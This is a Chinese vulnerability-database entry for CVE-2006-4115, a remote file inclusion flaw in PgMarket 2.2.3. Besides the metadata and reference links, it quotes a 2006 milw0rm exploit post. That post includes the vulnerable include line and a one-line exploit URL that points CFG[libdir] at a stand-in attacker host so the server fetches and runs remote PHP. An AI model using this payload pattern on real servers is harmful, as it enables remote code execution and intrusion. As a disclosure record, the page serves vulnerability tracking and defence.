PgMarket 'Common.Inc.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110788 漏洞类型 输入验证
发布时间 2006-08-09 更新时间 2006-08-15
CVE编号 CVE-2006-4115 CNNVD-ID CNNVD-200608-241
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2154
https://cxsecurity.com/issue/WLB-2006080084
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-241
|漏洞详情
PgMarket2.2.3的common.inc.php脚本存在PHP远程文件包含漏洞,当register_globals启用时,远程攻击者通过CFG[libdir]参数执行任意PHP代码。
|漏洞EXP
####################################################
#
#
#           C Y B E R - W A R R i O R   T I M
#
#
####################################################

PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities

####################################################

Author: xoron

####################################################

Class : Remote

####################################################

cont@ct: x0r0n[at]hotmail[dot]com

####################################################

Code:

include ($CFG["libdir"] . "stdlib.inc.php");

####################################################

Exploit:
http://server/[path]/common.inc.php?CFG[libdir]=http://evil_scripts?

####################################################

Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends

####################################################

# milw0rm.com [2006-08-09]
|参考资料

来源:XF
名称:pgmarket-common-file-include(28290)
链接:http://xforce.iss.net/xforce/xfdb/28290
来源:BID
名称:19439
链接:http://www.securityfocus.com/bid/19439
来源:BUGTRAQ
名称:20060809PgMarket2.2.3(CFG[libdir])RemoteFileInclusionVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/442684/100/0/threaded
来源:VUPEN
名称:ADV-2006-3240
链接:http://www.frsirt.com/english/advisories/2006/3240
来源:SREASON
名称:1375
链接:http://securityreason.com/securityalert/1375